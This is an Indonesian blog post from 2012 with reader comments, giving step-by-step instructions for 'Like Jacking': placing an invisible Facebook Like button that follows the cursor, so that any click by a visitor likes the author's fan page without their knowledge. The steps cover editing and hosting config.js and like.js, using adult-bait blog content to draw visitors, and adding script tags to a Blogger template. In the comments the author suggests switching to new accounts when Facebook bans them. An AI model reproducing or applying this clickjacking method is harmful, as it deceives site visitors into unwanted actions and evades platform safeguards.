10 Feb 2012

Cara Mendapatkan banyak Like Fans Page FB dengan Auto FB Like Jacking



Nah, Fans Page Facebook merupakan media yang bisa kita jadikan sebagai sarana untuk promosi apapun termasuk meningkatkan jumlah pengnjung/trafik ke blog kita. Semakin banyak jumlah like di fans fage fb kita akan semakin besar perkiraan kunjungan ke blog dari link yang kita share di fans page.

Like Buttonnya dibuat tersembunyi dan bergerak bersama dengan mouse. Jadi, dimanapun pengguna klik,  tombol seperti diklik dan halaman kipas Anda suka.Jadi banyak pemasaran untuk situs Anda dengan mudah.

Nah untuk itu DuniaGue.NET ingin membagi Cara Mendapatkan banyak Like Fans Page FB dengan FB Like Jacking. Itu sangat mudah dan tidak perlu biaya. Hanya memamfaatkan blogspot dan fanspage facebook orang lain yang sudah memiliki banyak fans.

Demo FB like jacking 1
Demo FB like jacking 2

Instruksinya :
1. Edit config.js dengan menggunakan notepad atau notepad++
    - Find "http://www.facebook.com/YourPageHere" dan ganti dengan alamat Facebook Page kalian, dan SAVE

2. Upload config.js <<(yang sudah di edit ) dan like.js ke hosting, Kalian juga bisa upload di code.google.com/projecthosting/
3. Buat Blog dengan Kategori Lendir
4. Ganti template dengan template yang sudah di download <<DOWNLOAD TEMPLATE>>
5. Posting 1 postinga yang sudah di download tadi ( point 2 dan 3 bersipat optional dan bisa diganti sesuai selera ), Jangan lupa pilih tab HTML dan paste kode postingan yang di sediakan tadi, kemudian post!
6. Kemudian edit HTML template blogspot
<script language='javascript' src='http://kabar-terbaru.googlecode.com/files/config.js'/>
Letakkan kode tersebut tepat di atas kode </head>
"Jangan lupa ganti alamat yg berwarna merah sesuai dengan tempat dimana kalian upload config.js tadi ( Point 2 )"

7.  Letakkan kode di bawah ini tepat di bawah kode <body>
<script language='javascript' src='Tempat upload/like.js'/>
"Jangan lupa ganti alamat yg berwarna merah sesuai dengan tempat dimana kalian upload like.js tadi ( Point 2 )"
8. Save Template

Untuk Banner Gallery artis yang ada di bawah postingan kalo bisa jangan di ganti dan dihapus yah... Backlink buat ane.. hehehe

Nah itu aja sih.. Biar banyak yg klik caranya sih kamu tinggal cari fans fage yang kategorinya sama dan sudah banyak likers nya. Sebar deh alamat blog kita di situ.

Oke Itu aja yang dulu.. Satu yang terpenting adalah duniague.NET tidak bertanggung jawab apabila facebook mem-banned ato menghapus fans page kalian. Tapi selama ini aman2 aja.. hihihihi

Biar gampang jadi ane update nih postingannya.... Jadi ane pasang videonya :
RSS Feed Berlangganan posting via RSS FEED

Atau berlangganan posting via email:


Description: Cara Mendapatkan banyak Like Fans Page FB dengan Auto FB Like Jacking Rating: 4.5 Reviewer: John Pinem - ItemReviewed: Cara Mendapatkan banyak Like Fans Page FB dengan Auto FB Like Jacking Hot News!!! "Sepeda Motor Injeksi Irit Harga Terbaik Cuma Honda"
Share on :

38 komentar :

makassarblog mengatakan...

gk work gan

Anonim mengatakan...

mantab...
work gan 100%...
oia gmn caranya suapaya tombol likenya gak keliatan sama sekali ya??
terimakasih sebelumnya :)

Johannes Govin mengatakan...

wah,kudu dicoba nich...

butik online mengatakan...

kalo muncul pop up fb like ketika halaman ditutup gimana ya bos??

John Pinem mengatakan...

ya gak dapat like.. tapi jangan kawatior sih,,, hampir semua pengguna internet begitu buka browser meraka pasti langsung login ke facebook dulu biasanya..

ZAEdotCOM BLOG || Blogger On Blogspot mengatakan...

ribet juga gan caranya,, jadi mikir dua kali lagi neh,, hhe

informasi pretelan mengatakan...

perlu di coba nich kebetulan baru bikin fans page :D thank dah sharing

Andri Wicaksono mengatakan...

rumit amat caranya? tp kpn2 boleh dicoba nih tips... gue bookmark dlu yah artikelna?
tks...

jesika mengatakan...

maaf gan .. ane cobain tapi ga bisa lagi .. malahan akun temen ane di banned ...
sekarang ane pake sum a fan program yg man dan terintegrasi dengan fb yg artinya legal
ni kalo temen temen yg lain mau nyobain ane kasih link nya
tinggal daftar trus cek email buat verifikasi http://en.sumafan.com/consigue_fans.php?Id=1164740337
semoga bermanfaat

shinta mengatakan...

mas.. aku udah nyoba n hasilnya berhasil.. tp kok tombol likenya gk pas d ujung panah kursor.. adanya d bawahnya,.., knapa yaa??
cek TKP donk.. ksh solusi..

mahir blogging mengatakan...

berbahaya nie gak gan,, alna pakek sembunyi-sembunyi, ketahua bisa-bisa di tembak gk,,

http://freelicsoft.blogspot.com/ mengatakan...

mantap brooooo


http://freelicsoft.blogspot.com/

Adîtz Bâzzîz Trâvêlz mengatakan...

mampir ke pageku yah :D

http://www.facebook.com/Raditya.Wardhana.Kiosho

Simkuring mengatakan...

mohon kritikannya for my blog, I newbie ? http://triksonline.blogspot.com

Unik dan Aneh mengatakan...

wah menarik skali nih caranya,,saya coba dulu ya gan....

Anggi Ilfa mengatakan...

lgsng coba ah gan :D :D

Darmawan Saputra mengatakan...

mantap infonya

Free Software - Blog-Daslen[dot]Com mengatakan...

Terima kasih gan tips Facebook jitunya, langsung dipraktekin... hehe

aqila mengatakan...

terima kasih kan ane coba dulu..

Hendro mengatakan...

cara kayak gini termasuk white hat pa black hat si gan??takut om google or Facebook malah ngeband nanti??

Blogger Galau mengatakan...

keren juga, tapi takut tar di baned :D

admin mengatakan...

waduh bahaia g nih ya mastah???
nanti di test dulu di blog dummy ah

andre mengatakan...

sip,,membanu artikelya..jgn lupa kunjungi sofnetgame.com yaa

jenan mengatakan...

waduh bagus nya bro

edi sukarman mengatakan...

Manteb banget dah Sob >> maknyos rasanya >>>>
thanks

John Pinem mengatakan...

Sama2 gan :)

John Pinem mengatakan...

Terimakasih kunjungannya

John Pinem mengatakan...

Ane cuma share triknya.. masalah banned ane gak bisa pastiin soalnya itu keputusan dari fb, coba pake akun baru aja mastah :)

John Pinem mengatakan...

Ane cuma share triknya.. masalah banned ane gak bisa pastiin soalnya itu keputusan dari fb, coba pake akun baru aja mastah :) Ane sih lom ada masalah selama ini

John Pinem mengatakan...

sama2 gan

John Pinem mengatakan...

selamat bereksperimen gan :)

John Pinem mengatakan...

ane da sih kmaren.. cuma lom sempat share aja.. lagi banyak kerjaan mastah :) ntar kalo ada waktu ane posting dehh

John Pinem mengatakan...

Kalo masalah bahanya ane kurang tau gan.. tapi selama ini ane aman2 aja sih.. coba pake akun fb dan blogger yang baru aja :)

Jefry mengatakan...

Lengkap sekali arahannya, Insya Allah saya juga mau menerapkan cara ini agar makin banyak yang ngelike fb saya
terima kasih

Gayo Porang mengatakan...

gan itu kan tampilan blognya yg lama, yg baru ada gak. .

arif mengatakan...

Numpang Promo Y Min ............
Hai Sobat Like Lah https://www.facebook.com/MemeIndonesiaKomunitasInternasional Karena Kalian Akan Mendapatkan Hal" Yg Sngt Lucu Di https://www.facebook.com/MemeIndonesiaKomunitasInternasional
Yg Lagi Galau Pasti Akan Terhibur Dan Kami Mencari Admin Yg Setiap Hari Ngepost,Jadi Tolong Bnatuannya Y (1 Like Sangat Berati Bagi Kami)Sekian Dari Saya
Admin"
Kalo Gk Suka Jgn Di Blok Dihapus Aja

Rahasia Jejaring Sosial mengatakan...

Pengen sekali nyoba, tapi kok kayaknya udah update ya blogspotnya.. ada perubahan juga gak work gtu mksdnya..? Saya pengen bikin untuk blog baru saya Rahasia Jejaring Sosial

Tutorial Tips Trik Mudah seo dan panduan desain terpadu mengatakan...

ijin coba dulu sob ?

Poskan Komentar

Mau tukeran link? silakan buka Link sahabat dan apabila ada pertanyaan silakan tulis di Kotak Pertanyaan. Terima Kasih...

Kami akan menghapus komentar yang: Tak sopan, memakai HURUF BESAR, berupa caci maki, mengandung kata-kata kebun binatang, debat kusir, provokasi, di luar konteks, berupa undangan/ reklame. Komentar yang terlalu panjang, tanpa paragraf dan sulit dipahami. Komentar copy-paste, silakan di-link saja.

Isi komentar adalah tanggung jawab penulis komentar, bukan tanggung jawab pengelola blog/situs ini. Harap maklum.

 
© Copyright Dunia GUE 2011 - Some rights reserved | Powered by Blogger.com .
Template Design by Herdiansyah Hamzah | Jejaringkan Kami di Jejaring Sosial (duniague.net)